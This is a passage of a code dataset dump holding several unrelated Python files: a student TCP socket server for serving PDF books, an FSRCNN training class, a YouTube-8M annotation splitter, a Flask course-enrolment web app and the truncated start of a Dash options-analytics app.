"428771751", "text": "#Modulo servidor para el Proyecto 1 de Redes 1 Enero Marzo 2018\n#Integrantes: Salvador Gonzalez - 10-10296\n#\t\t\t Valentina Hernandez - 10-10352 \nfrom __future__ import print_function\nfrom time import sleep\nimport datetime as d\nimport os,signal\nimport sys\nimport socket as s\n\n#Funcion para listar las descargas completadas de los libros:\ndef listCompleted():\n\tprint()\n\ttry:\n\t\tfile = open(\"./Downladed_Books.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tprint(line,end=\"\")\n\t\tprint()\n\texcept:\n\t\tprint(\"No se han completado descargas todavia...\")\n#Funcion encargada de obtener la lista de todos los clientes que han consultado al servidor\ndef getClients():\n\tprint()\n\ttry:\n\t\tfile = open(\"./sessions.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tprint(line,end=\"\")\n\t\tfile.close()\n\texcept:\n\t\tprint(\"El servidor todavia no ha sido consultado...\")\n#Funcion encargada de Mandarle la lista de los pdfs presentes en el servidor al cliente\n#@Param socket: cliente al cual se le enviara la informacion\ndef getBookList(socket):\n\tbooklist = os.listdir(\"./Pdfs\")\n\tfor book in booklist:\n\t\tsocket.send(book)\n\t\tsocket.send(\" \")\n\tsocket.send(\"#\")\n#Funcion para listar el numero de descargas x cliente y por libro\ndef listBookClient():\n\tocurrencias_c = {}#Diccionario para las ocurrencias de los clientes\n\tocurrencias_b = {}#Diccionario para las ocurrencias de los libros\n\tprint()\n\ttry:\n\t\tfile = open(\"./Client_Books.txt\",\"r\")\n\t\tfor line in file:\n\t\t\tclient,libro,nulo = line.split(\"-\")\n\t\t\tif client in ocurrencias_c:\n\t\t\t\tocurrencias_c[client] += 1\n\t\t\telse:\n\t\t\t\tocurrencias_c[client] = 1\n\t\t\tif libro in ocurrencias_b:\n\t\t\t\tocurrencias_b[libro] += 1\n\t\t\telse:\n\t\t\t\tocurrencias_b[libro] = 1\n\t\tprint(\"Numero de descargas por libro\")\n\t\tfor key in ocurrencias_b:\n\t\t\tprint(\"Libro: %s - Descargas: %s\"%(key,ocurrencias_b[key]))\n\t\tprint()\n\t\tprint(\"Numero de descargas por cliente\")\n\t\tfor key in ocurrencias_c:\n\t\t\tprint(\"Cliente: %s - Descargas: %s\"%(key,ocurrencias_c[key]))\n\texcept:\n\t\tprint(\"No se han realizado descargas en este servidor....\")\n#Funcion para listar las descargas en curso\ndef listDownloads():\n\tdownList = os.listdir(\"./Server_info\")\n\tif downList:\n\t\tfor download in downList:\n\t\t\tfile = open(\"./Server_info/%s\"%(download),\"r\")\n\t\t\tprint()\n\t\t\tprint(file.readline(),end=\"\")\n\t\t\tfile.close()\n\t\tprint()\n\telse:\n\t\tprint(\"\\nNo existen descargas en curso actualmente....\")\n#Funcion para el envio del alchivo al cliente\n#@Param socket: cliente al cual se le enviara el archivo\n#@Param info: informacion del cliente al cual se le enviara el pdf tupla (IP,PUERTO)\n#@Param pid: PID del proceso que envia el archivo para llevar el estatus de descarga\ndef sendBook(socket,info,pid):\n\tbook = socket.recv(200)#Variable para contener la informacion del libro (paquete de tamano fijo)\n\tbook = filter(lambda x: x!=\" \",book)#obtenemos el nombre\n\tfilesize = str(os.path.getsize(\"./Pdfs/%s\"%(book)))#Tamagno en bytes del archivo a enviar\n\twhile(len(filesize) < 10):\n\t\tfilesize+=\" \"\n\tsocket.send(filesize)\n\tfilesize = filter(lambda x: x != \" \",filesize)\n\t#Archivo que deseamos enviar\n\tfile = open(\"./Pdfs/%s\"%(book),\"r\")\n\tread = 0 #Variable para los bytes leidos\n\tdata = \" \"#Variable para guardar la data\n\twhile(data != \"\"):\n\t\t#Archivo para guardar el status de la descarga\n\t\tstatus = open(\"./Server_info/%s.txt\"%(pid),\"w\")\n\t\tdata = file.read(1000)\n\t\tread += len(data)\n\t\tsocket.send(data)\n\t\tstatus.write(\"CLiente: %s - Libro: %s - %s de %s bytes...\"%(info[0],book,read,filesize))\n\t\tstatus.close()\n\t\tsleep(3)\n\tfile.close()\n\tos.remove(\"./Server_info/%s.txt\"%(pid))\n\t#Si se completa la descarga/ anadimos el libro a la lista de descargas\n\tdate = d.datetime.now()\n\tfile = open(\"./Downladed_Books.txt\",\"a\")\n\tfile.write(\"Libro: %s - Fecha: %s-%s-%s - Hora: %s:%s:%s\\n\"%(book,date.day,date.month,date.year,date.hour,date.minute,date.second))\n\tfile.close()\n\t#Registro para el num de descargas x libro x cliente\n\tfile = open(\"./Client_Books.txt\",\"a\")\n\tfile.write(\"%s-%s-\\n\"%(info[0],book))\n\tfile.close()\n\ndef main():\n\tif (len(sys.argv) != 2):\n\t\tprint(\"La invocacion para el servidor debe ser de la forma: \",end=\"\")\n\t\tprint(\"python server.py \")\n\t\treturn\n\tport = sys.argv[1]#Numero de puerto para el socket\n\tserver_info = (\"\",int(port))#Informacion de nuestro servidor\n\t#la tupla contiene informacion referente a (Direccion Ip,Puerto de escucha)\n\t#Definimos el socket de para nuestro servidor\n\t#AF_INET y SOCK_STREAM son parametros para utilizar Protocolo TCP\n\t#AF_INET es para direcciones IPv4\n\tprint(\"Generando socket...\")\n\tsleep(1)\n\ttry:\n\t\tserver_socket = s.socket(s.AF_INET,s.SOCK_STREAM)\n\t\tprint(\"socket creado...\")\n\t\tsleep(1)\n\texcept:\n\t\tprint(\"Error al generar el Socket para el servidor...\")\n\t\treturn\n\tprint(\"Asociando puerto %s al socket...\" % port)\n\tsleep(1)\n\ttry:\n\t\tserver_socket.bind(server_info)\n\t\tprint(\"Asociancion establecida...\")\n\t\tsleep(1)\n\texcept:\n\t\tprint(\"Error al asociar el puerto al socket...\")\n\t\treturn\n\t#Creamos el directorio para la informacion del server:\n\ttry:\n\t\tos.mkdir(\"./Server_info\")\n\texcept:\n\t\tfiles = os.listdir(\"./Server_info\")\n\t\tfor file in files:\n\t\t\tos.remove(\"./Server_info/%s\"%(file))\n\t#Proceso hijo para la escuha de las peticiones\n\tconnection_handler = os.fork()\n\t#Codigo para el proceso hijo\n\tif connection_handler == 0:\n\t\t#Guardamos el PID del hijo para cerrarlo al finalizar el programa\n\t\tp_id = str(os.getpid())\n\t\tfile = open(\"./listen_process.txt\",\"w\")\n\t\tfile.write(p_id)\n\t\tfile.close()\n\t\twhile True:\n\t\t\t#Listen se encarga de escuchar las peticiones, el valor 100 esel tama;o de la cola\n\t\t\t#de peticiones que puede recibir el servidor\n\t\t\tserver_socket.listen(100)\n\t\t\t#Esperamos aceptar las peticiones de los clientes\n\t\t\t#client_info es una tupla de la forma (IP,PUERTO)\n\t\t\tclient_socket,client_info = server_socket.accept()\n\t\t\t#Anadimos la sesion\n\t\t\tfile = open(\"./sessions.txt\",\"a\")\n\t\t\tdate = d.datetime.now()\n\t\t\tfile.write(\"Cliente: %s Fecha: %s-%s-%s Hora: %s:%s:%s\\n\" %(client_info[0],date.day,date.month,date.year,date.hour,date.minute,date.second))\n\t\t\tfile.close()\n\t\t\t#Se vuelve a crear un fork para atender las peticiones una ve escuchadas\n\t\t\trequest_processor = os.fork()\n\t\t\t#Codigo para el proceso hijo encargado de atender/ejecutar las peticiones\n\t\t\tif (request_processor == 0):\n\t\t\t\tp_id = str(os.getpid())\n\t\t\t\toption = client_socket.recv(1)\n\t\t\t\tif option == \"2\":\n\t\t\t\t\tgetBookList(client_socket)\n\t\t\t\telif option == \"3\":\n\t\t\t\t\tsendBook(client_socket,client_info,p_id)\n\t\t\t\telse:\n\t\t\t\t\tpass\n\t\t\t\tquit()\n\t#codigo para el proceso padre - Menu principal\n\telse:\n\t\toption = 0\n\t\twhile(option < 5):\n\t\t\tprint(\"\\nBienvenido al sistema de gestion del servidor... Que opcion desea ejecutar\")\n\t\t\tprint(\"1: LIBROS_DESCARGADOS\")\n\t\t\tprint(\"2: CLIENTES_QUE_CONSULTARON\")\n\t\t\tprint(\"3: NUM_DESCARGASxLIBROxCLIENTE\")\n\t\t\tprint(\"4: DESCARGAS_EN_CURSO\")\n\t\t\tprint(\"5: Salir...\")\n\t\t\toption = raw_input(\"Opcion: \")\n\t\t\tif option.isdigit():\n\t\t\t\toption = int(option)\n\t\t\t\t#Opcion para el listado de descargas completas\n\t\t\t\tif option == 1:\n\t\t\t\t\tlistCompleted()\n\t\t\t\t#Opcion para los clientes que me han consultado\n\t\t\t\telif option == 2:\n\t\t\t\t\tgetClients()\n\t\t\t\telif option == 3:\n\t\t\t\t\tlistBookClient()\n\t\t\t\t#Opcion para listar las descargas en curso\n\t\t\t\telif option == 4:\n\t\t\t\t\tlistDownloads()\n\t\t\t\t#Opcion para finalizar la corrida\n\t\t\t\telif option == 5:\n\t\t\t\t\t#Cerramos el socket del server\n\t\t\t\t\tserver_socket.close()\n\t\t\t\t\t#Matamos el proceso listener para dejar libre el puerto\n\t\t\t\t\tfile = open(\"./listen_process.txt\",\"r\")\n\t\t\t\t\tp_id = int(file.read())\n\t\t\t\t\tos.kill(p_id,signal.SIGKILL)\n\t\t\t\t\tos.remove(\"./listen_process.txt\")\n\t\t\t\t\t#Borramos el contenido de la carpera Server_info\n\t\t\t\t\tinfo = os.listdir(\"./Server_info\")\n\t\t\t\t\tfor file in info:\n\t\t\t\t\t\tos.remove(\"./Server_info/%s\"%(file))\n\t\t\t\t\tos.rmdir(\"./Server_info\")\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Ha ingresado una opcion invalida...\")\n\t\t\t\t\toption = 0\n\t\t\telse:\n\t\t\t\tprint(\"Ha ingresado una opcion invalida...\")\n\t\t\t\toption = 0\n\n\n\nif __name__ == '__main__':\n\tmain()", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 7875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 36, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 37, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 38, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 67, "usage_type": "call"}, {"api_name": "socket.recv", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "socket.send", "line_number": 87, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 101, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 126, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 128, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 128, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 128, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 130, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 135, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 139, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 145, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 147, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 149, "usage_type": "call"}, {"api_name": "os.fork", "line_number": 151, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 168, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.fork", "line_number": 172, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 175, "usage_type": "call"}, {"api_name": "os.kill", "line_number": 215, "usage_type": "call"}, {"api_name": "signal.SIGKILL", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 216, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 218, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 220, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "473138363", "text": "import torch\nimport torch.backends.cudnn as cudnn\n\nfrom models.FSRCNN.model import Net\nfrom trainer import Trainer\n\n\nclass FSRCNNTrainer(Trainer):\n def __init__(self, config, training_loader, valid_loader):\n super(FSRCNNTrainer, self).__init__(config, training_loader, valid_loader, \"fsrcnn\")\n\n def build_model(self):\n self.model = Net(num_channels=3, upscale_factor=self.upscale_factor).to(self.device)\n self.model.weight_init(mean=0.0, std=0.2)\n self.criterion = torch.nn.MSELoss()\n torch.manual_seed(self.seed)\n\n if self.GPU_IN_USE:\n torch.cuda.manual_seed(self.seed)\n cudnn.benchmark = True\n self.criterion.cuda()\n\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[50, 75, 100], gamma=0.5) # lr decay\n", "sub_path": "models/FSRCNN/fsrcnn_trainer.py", "file_name": "fsrcnn_trainer.py", "file_ext": "py", "file_size_in_byte": 906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "trainer.Trainer", "line_number": 8, "usage_type": "name"}, {"api_name": "models.FSRCNN.model.Net", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 24, "usage_type": "attribute"}]} +{"seq_id": "230193758", "text": "import json\nimport random\nfrom argparse import ArgumentParser\nfrom collections import defaultdict\nfrom os import makedirs, listdir\nfrom os.path import exists, join, isfile, basename\n\n\ndef ensure_dir_exists(dir_path):\n if not exists(dir_path):\n makedirs(dir_path)\n\n\ndef get_valid_sources(all_sources):\n return [s for s in all_sources if exists(s)]\n\n\ndef print_data_sources_stat(data_sources):\n print('Specified {} valid data sources:'.format(len(data_sources)))\n for data_source in data_sources:\n print(' - {}'.format(data_source))\n\n\ndef parse_records(data_sources):\n num_records = defaultdict(int)\n out_records = dict()\n for data_source in data_sources:\n data_type = basename(data_source).split('.')[0]\n\n with open(data_source) as input_stream:\n for line_id, line in enumerate(input_stream):\n if line_id == 0:\n continue\n\n line_elements = line.strip().split(',')\n if len(line_elements) != 4:\n continue\n\n label, video_name, start, end = line_elements\n\n segment_id = num_records[video_name]\n segment_name = f'{video_name}_segment{segment_id}'\n\n num_records[video_name] += 1\n out_records[segment_name] = dict(\n label=int(label),\n data_type=data_type\n )\n\n return out_records\n\n\ndef validate_videos(records, videos_dir, extension):\n downloaded_videos = set(\n f.replace(f'.{extension}', '')\n for f in listdir(videos_dir)\n if isfile(join(videos_dir, f)) and f.endswith(extension)\n )\n all_videos = set(video_name for video_name in records.keys())\n\n valid_videos = downloaded_videos & all_videos\n out_records = {video_name: records[video_name] for video_name in valid_videos}\n\n return out_records\n\n\ndef split_train_val_subsets(records, test_ratio=0.1):\n assert 0.0 < test_ratio < 1.0\n\n by_labels = defaultdict(list)\n for video_name, content in records.items():\n by_labels[content['label']].append(video_name)\n\n clustered_segments = dict()\n for label, segments in by_labels.items():\n videos = defaultdict(list)\n for segment in segments:\n video, _ = segment.split('_segment')\n videos[video].append(segment)\n\n clustered_segments[label] = videos\n\n out_records = dict()\n for label, videos in clustered_segments.items():\n num_records = len(by_labels[label])\n assert num_records > 1\n\n video_names = list(videos.keys())\n num_videos = len(video_names)\n assert num_videos > 1\n\n num_test_samples = min(num_records - 1, max(1, int(num_records * test_ratio)))\n num_test_videos = min(num_videos - 1, max(1, int(num_videos * test_ratio)))\n\n num_selected_test_samples = 0\n test_videos = []\n for test_video_name in random.sample(video_names, num_test_videos):\n test_videos.append(test_video_name)\n segments = videos[test_video_name]\n\n for segment in segments:\n out_records[segment] = dict(label=label, data_type='val')\n\n num_selected_test_samples += len(segments)\n if num_selected_test_samples >= num_test_samples:\n break\n\n train_videos = list(set(video_names) - set(test_videos))\n for train_video_name in train_videos:\n segments = videos[train_video_name]\n\n for segment in segments:\n out_records[segment] = dict(label=label, data_type='train')\n\n return out_records\n\n\ndef build_classmap(records):\n labels = set(record['label'] for record in records.values())\n return {class_name: i for i, class_name in enumerate(sorted(labels))}\n\n\ndef convert_annot(records, classmap, extension):\n out_records = dict()\n for video_name, content in records.items():\n label_id = classmap[content['label']]\n out_records[f'{video_name}.{extension}'] = label_id, content['data_type']\n\n return out_records\n\n\ndef group_by_type(annotation):\n out_data = defaultdict(list)\n for video_name, (label_id, data_type) in annotation.items():\n out_data[data_type].append((video_name, label_id))\n\n return out_data\n\n\ndef write_classmap(classmap, out_path):\n with open(out_path, 'w') as output_stream:\n json.dump(classmap, output_stream)\n\n\ndef write_annot(records, out_path):\n with open(out_path, 'w') as output_stream:\n for video_name, label_id in records:\n output_stream.write(f'{video_name} {label_id}\\n')\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--sources', '-s', nargs='+', type=str, required=True)\n parser.add_argument('--videos_dir', '-v', type=str, required=True)\n parser.add_argument('--output_dir', '-o', type=str, required=True)\n parser.add_argument('--extension', '-e', type=str, required=False, default='avi')\n parser.add_argument('--test_ratio', '-r', type=float, required=False, default=0.1)\n args = parser.parse_args()\n\n ensure_dir_exists(args.output_dir)\n\n data_sources = get_valid_sources(args.sources)\n print_data_sources_stat(data_sources)\n assert len(data_sources) > 0\n\n records = parse_records(data_sources)\n print(f'Found {len(records)} records.')\n\n classmap = build_classmap(records)\n print(f'Found {len(classmap)} unique classes.')\n\n out_classmap_path = join(args.output_dir, 'classmap.json')\n write_classmap(classmap, out_classmap_path)\n print(f'Dumped classmap to: {out_classmap_path}')\n\n records = validate_videos(records, args.videos_dir, args.extension)\n print(f'Validated {len(records)} videos.')\n\n records = split_train_val_subsets(records, args.test_ratio)\n\n annot = convert_annot(records, classmap, args.extension)\n split_annot = group_by_type(annot)\n\n for data_type, records in split_annot.items():\n out_annot_path = join(args.output_dir, f'{data_type}.txt')\n write_annot(records, out_annot_path)\n print(f'Dumped annot to: {out_annot_path}')\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tools/data/youtube-8m/prepare_annot.py", "file_name": "prepare_annot.py", "file_ext": "py", "file_size_in_byte": 6137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 28, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 70, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 76, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 97, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 133, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 142, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}]} +{"seq_id": "558869849", "text": "import json\n\njson_file=open('week1.json')\ndata=json.load(json_file)\nprint(type(data))\nview={'Monday':{},'Tuesday':{},'Wednesday':{},'Thursday':{},'Friday':{}}\n\nfor p in data:\n temp=0\n for k,v in p[2]['conference-categories-count'].items():\n temp=temp+v\n if p[0]['dow']=='Monday':\n view['Monday'][p[1]['time']]=temp\n elif p[0]['dow']=='Tuesday':\n view['Tuesday'][p[1]['time']] = temp\n elif p[0]['dow']=='Wednesday':\n view['Wednesday'][p[1]['time']] = temp\n elif p[0]['dow']=='Thursday':\n view['Thursday'][p[1]['time']] = temp\n elif p[0]['dow']=='Friday':\n view['Friday'][p[1]['time']] = temp\n\nfor k,v in view.items():\n print(\"{}===>{}\".format(k,v))\n\n\n\n", "sub_path": "ReadJSON.py", "file_name": "ReadJSON.py", "file_ext": "py", "file_size_in_byte": 717, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "516869642", "text": "from flask import Flask, request, render_template, redirect, url_for, flash\nimport dao.connect\nimport threading\nimport csv\nimport re\nimport beans.fach\nimport dao.application_dao\nfrom beans import fach\n\n\napp = Flask(__name__, template_folder='template')\napp.secret_key = b'hdgsJ%82/\"*dbh#'\n\n\ndef csv_reader(path):\n with open(path, \"r\") as csvfile:\n tmp = {}\n reader = csv.reader(csvfile, delimiter='=')\n for line in reader:\n tmp[line[0]] = line[1]\n return tmp\n\nconfig = csv_reader(\"properties.settings\")\n\n\n@app.route(\"//\", methods=['GET', 'POST'])\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index(bid):\n \"\"\"Erste Seite der Webseite: \"\"\"\n user_store = dao.application_dao.ApplicationDao() \n\n meine_kurse = user_store.get_my_courses(bid)\n verf_kurse = user_store.get_all_other_courses(bid)\n\n #result = False\n #if request.method == \"POST\":\n # Form data\n #name = request.form['course_name'] \n #enroll_key = request.form.get('schluessel')\n #free_spots = request.form.get('freie_plaetze') \n #desc = request.form.get('btext')\n \n #print(name, bid, enroll_key, free_spots, desc)\n \n #new_course = fach.Kurs(name, bid, free_spots, desc, enroll_key)\n \n #course_store = dao.application_dao.ApplicationDao()\n\n #course_id = course_store.add_course(new_course) # Muss eine valide kid zurückliefern\n #print(course_id, bid)\n #course_store.completion()\n #course_store.close()\n\n #if course_id is not None: #Wenn course_id nicht NULL ist, ist es valid #TODO\n #with threading.Lock():\n #user_store.einschreiben(bid, course_id, enroll_key) #Add owner to course, Fix\n \n #user_store.completion()\n #user_store.close()\n\n # TODO res=result\n return render_template('index.html', mkurse=meine_kurse, vkurse=verf_kurse, bid=bid)\n\n\n@app.route(\"//new_course\", methods=['POST', 'GET'])\ndef new_course(bid):\n return render_template(\"new_course.html\", bid=bid)\n\n\n@app.route(\"//view_course\", methods=['POST', 'GET'])\ndef view_course(bid):\n info_store = dao.application_dao.ApplicationDao()\n kname = str(request.form.get(\"kname\"))\n ersteller = str(request.form.get(\"ersteller\"))\n fp = request.form.get(\"fp\")\n\n #print(bid)\n\n #Einschreibeschlüssel, wenn vorhanden. Wird benutzt zu prüfen, ob ein Schlüssel stimmt\n reg_key = info_store.get_key(kname, ersteller) \n\n #course owner\n owner = info_store.get_course_owner(kname) \n #print(owner)\n\n desc = info_store.get_course_details(kname, ersteller)\n\n # Read details for above data from database \n\n #course id\n kid = info_store.get_kid(kname, ersteller)\n\n #print(ersteller)\n #print(kid)\n #print(bid)\n\n #check resgistrstion status. Returns True or False\n registered = info_store.is_registered(bid, kid)\n\n #print(bid, kid)\n #print(registered)\n\n exercises = None\n\n #Get exercises for kid retieved\n exercises = info_store.get_ex_list(kid, int(bid))\n\n # TODO: Different view for ersteller\n\n\n return render_template(\"view_course.html\", bid=bid, kname=kname, desc=desc, fp=fp, \n ersteller=ersteller, schluessel=reg_key, owner=owner, exercises=exercises, \n registered=registered, kid=kid)\n\n\n@app.route('//new_enroll', methods=['POST', 'GET'])\ndef new_enroll(bid):\n kname = request.form.get(\"kname\")\n ersteller = request.form.get(\"ersteller\")\n\n\n return render_template('new_enroll.html', bid=bid, kname=kname, ersteller=ersteller)\n\n\n@app.route('//new_assignment', methods=['POST', 'GET'])\ndef new_assignment(bid):\n\n store_submission = dao.application_dao.ApplicationDao()\n \n kid = request.form.get('kid')\n\n anummer = request.form.get('anummer')\n\n kname = request.form.get('kname')\n\n ex_name = request.form.get('ex_name')\n\n\n #TODO: decription\n #desc = store_submission.get_ex_details(kid, anummer)\n\n\n #print(bid, kid, anummer)\n\n #Submissions should be done only once: TODO: Is defective\n #is_duplicate = store_submission.submission_exists(bid, kid, anummer)\n\n #print(is_duplicate) TODO\n\n return render_template('new_assignment.html', kname=kname, ex_name=ex_name)\n\n\n@app.route('/onlineLearner', methods=['GET'])\ndef onlineLearn():\n\n try:\n dbExists = dao.connect.DBUtil().checkDatabaseExistsExternal()\n if dbExists:\n db2exists = 'vorhanden! Supi!'\n else:\n db2exists = 'nicht vorhanden :-('\n except Exception as e:\n print(e)\n\n return render_template('onlineLearner.html', db2exists=db2exists, db2name=\"onlineLearner\")\n\n\n\n\n\nif __name__ == \"__main__\":\n port = int(\"9\" + re.match(r\"([a-z]+)([0-9]+)\", config[\"username\"], re.I).groups()[1])\n app.run(host='0.0.0.0', port=port, debug=True)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 18, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 30, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 72, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 72, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 122, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 128, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 128, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 128, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 136, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 150, "usage_type": "call"}, {"api_name": "dao.connect.connect.DBUtil", "line_number": 157, "usage_type": "call"}, {"api_name": "dao.connect.connect", "line_number": 157, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 165, "usage_type": "call"}, {"api_name": "re.match", "line_number": 172, "usage_type": "call"}, {"api_name": "re.I", "line_number": 172, "usage_type": "attribute"}]} +{"seq_id": "269776011", "text": "# Import required libraries\nimport os\nimport datetime as dt\n\nimport numpy as np\nimport pandas as pd\nimport plotly.plotly as py\nimport flask\nimport dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nimport dash_table_experiments as dasht\n\nfrom py_vollib.black_scholes_merton.implied_volatility import *\nfrom py_vollib.black_scholes_merton.greeks.analytical import *\nfrom data_collect import *\n\n\n# Setup app\n# server = flask.Flask(__name__)\n# server.secret_key = os.environ.get('secret_key', 'secret')\n# app = dash.Dash(__name__, server=server, 